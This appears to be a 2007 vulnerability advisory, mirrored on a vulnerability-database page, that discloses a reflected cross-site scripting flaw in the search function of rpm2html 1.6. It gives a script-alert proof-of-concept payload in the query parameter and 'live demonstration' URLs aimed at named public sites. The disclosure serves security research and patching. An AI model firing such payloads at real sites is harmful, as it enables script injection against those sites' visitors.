Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17039
HistoryMay 18, 2007 - 12:00 a.m.

rpm2html 1.6 XSS Vulnerability

2007-05-1800:00:00
vulners.com
24
JSON

----------------------------------------------------------------------|
My Name: Vladiii |
My Country: Romania |
My Site: http://www.rstzone.net |
My Team: I hope to enter in RST-Crew :) |
Contact me: [email protected] |
Special Shoutz: kw3rln (fluffy_bunny), flo_flow_supremacy, mozi2weed, |
& all RST-crew & RSB-team Members. |
----------------------------------------------------------------------|
Vulnerable code: rpm2html 1.6 |

Download it from: http://public.www.planetmirror.com/pub/rpm2html/
XSS Vulnerability in search function :)
Details: we can change the query in URL with <script>alert('xss')</script> 
     and will appear a Message Box with our code :&#41;

Demonstration: http://vulerablesite.com/path/rpm2html[path]/search.php?query=&lt;script&gt;alert&#40;&#39;xss&#39;&#41;&lt;/script&gt;&amp;blabla
Live demonstration: http://rpms.mandrivaclub.com/search.php?query=&#37;3Cscript&#37;3Ealert&#40;&#39;xss&#39;&#41;&#37;3C/script&#37;3E&amp;submit=Search+
http://rpmfind.net/linux/rpm2html/search.php?query=&#37;3Cscript&#37;3Ealert&#40;&#39;xss&#39;&#41;&#37;3C/script&#37;3E

POC !

vladiii 2007

We won't tell. Get more on shows you hate to love
(and love to hate): Yahoo! TV's Guilty Pleasures list.

Now that's room service! Choose from over 150,000 hotels
in 45,000 destinations on Yahoo! Travel to find your fit.

JSON